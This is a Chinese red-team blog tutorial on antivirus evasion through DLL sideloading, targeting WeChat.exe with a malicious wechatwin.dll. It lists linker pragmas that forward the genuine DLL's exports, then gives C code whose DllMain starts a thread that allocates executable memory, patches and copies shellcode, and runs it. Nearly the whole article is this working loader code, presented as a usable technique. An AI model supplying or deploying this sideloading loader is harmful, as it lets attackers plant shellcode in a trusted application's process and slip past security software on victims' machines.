1. 首页
  2. 红队技术

白加黑源码免杀学习

概述

白程序:WeChat.exe

恶意dll:wechatwin.dll

制作流程

  • 获取导出函数列表
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@$$QAV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@$$QAV0@@Z,@1")
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@ABV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@ABV0@@Z,@2")
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@XZ=tmp3ACF.??0IChannelLogWriter@@QAE@XZ,@3")
#pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z,@4")
#pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@ABV0@@Z,@5")
#pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@$$QAV0@@Z,@6")
#pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@ABV0@@Z,@7")
#pragma comment(linker, "/export:??_7IChannelLogWriter@@6B@=tmp3ACF.??_7IChannelLogWriter@@6B@,@8")
#pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHKI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHKI@Z,@9")
#pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHPAXI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHPAXI@Z,@10")
#pragma comment(linker, "/export:?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z=tmp3ACF.?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z,@11")
#pragma comment(linker, "/export:?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z=tmp3ACF.?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z,@12")
#pragma comment(linker, "/export:?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z=tmp3ACF.?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z,@13")
#pragma comment(linker, "/export:?GetBugReportFlag@TXBugReport@@YAKXZ=tmp3ACF.?GetBugReportFlag@TXBugReport@@YAKXZ,@14")
#pragma comment(linker, "/export:?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ=tmp3ACF.?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ,@15")
#pragma comment(linker, "/export:?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ=tmp3ACF.?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ,@16")
#pragma comment(linker, "/export:?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z=tmp3ACF.?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z,@17")
#pragma comment(linker, "/export:?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z=tmp3ACF.?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z,@18")
#pragma comment(linker, "/export:?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z=tmp3ACF.?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z,@19")
#pragma comment(linker, "/export:?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z=tmp3ACF.?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z,@20")
#pragma comment(linker, "/export:?SetBugReportFlag@TXBugReport@@YAHK@Z=tmp3ACF.?SetBugReportFlag@TXBugReport@@YAHK@Z,@21")
#pragma comment(linker, "/export:?SetBugReportPath@TXBugReport@@YAHPB_W@Z=tmp3ACF.?SetBugReportPath@TXBugReport@@YAHPB_W@Z,@22")
#pragma comment(linker, "/export:?SetBugReportUin@TXBugReport@@YAXKH@Z=tmp3ACF.?SetBugReportUin@TXBugReport@@YAXKH@Z,@23")
#pragma comment(linker, "/export:?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z=tmp3ACF.?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z,@24")
#pragma comment(linker, "/export:?SetExtInfo@TXBugReport@@YAHKKPB_W@Z=tmp3ACF.?SetExtInfo@TXBugReport@@YAHKKPB_W@Z,@25")
#pragma comment(linker, "/export:?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z=tmp3ACF.?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z,@26")
#pragma comment(linker, "/export:?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z=tmp3ACF.?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z,@27")
#pragma comment(linker, "/export:?UninitBugReport@TXBugReport@@YAXXZ=tmp3ACF.?UninitBugReport@TXBugReport@@YAXXZ,@28")
#pragma comment(linker, "/export:?ValidateBugReport@TXBugReport@@YAXXZ=tmp3ACF.?ValidateBugReport@TXBugReport@@YAXXZ,@29")
#pragma comment(linker, "/export:?pfPostBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPostBugReport@TXBugReport@@3P6AXXZA,@30")
#pragma comment(linker, "/export:?pfPreBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPreBugReport@TXBugReport@@3P6AXXZA,@31")
#pragma comment(linker, "/export:SignWith3Des=tmp3ACF.SignWith3Des,@32")
#pragma comment(linker, "/export:StartWachat=tmp3ACF.StartWachat,@33")
#pragma comment(linker, "/export:_TlsGetData@12=tmp3ACF._TlsGetData@12,@34")
#pragma comment(linker, "/export:_TlsStoreData@12=tmp3ACF._TlsStoreData@12,@35")
#pragma comment(linker, "/export:__ASSERT=tmp3ACF.__ASSERT,@36")

shellcode写入内存加载

DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
	void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(shellcode, first, 2);
	memcpy(shellcode + 834, a, 2);
	memcpy(exec, shellcode, sizeof shellcode);
	((void(*)())exec)();
	return 0;
}

DllMain执行jmp_shellcode

BOOL WINAPI
DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{

	HANDLE threadHandle;

	switch (dwReason)
	{
	case DLL_PROCESS_ATTACH:

		// Create a thread and close the handle as we do not want to use it to wait for it 

		threadHandle = CreateThread(NULL, 0, jmp_shellcode, NULL, 0, NULL);
		CloseHandle(threadHandle);

		break;

	case DLL_PROCESS_DETACH:
		// Code to run when the DLL is freed
		break;

	case DLL_THREAD_ATTACH:
		// Code to run when a thread is created during the DLL's lifetime
		break;

	case DLL_THREAD_DETACH:
		// Code to run when a thread ends normally.
		break;
	}
	return TRUE;
}

原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/archives/3180

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息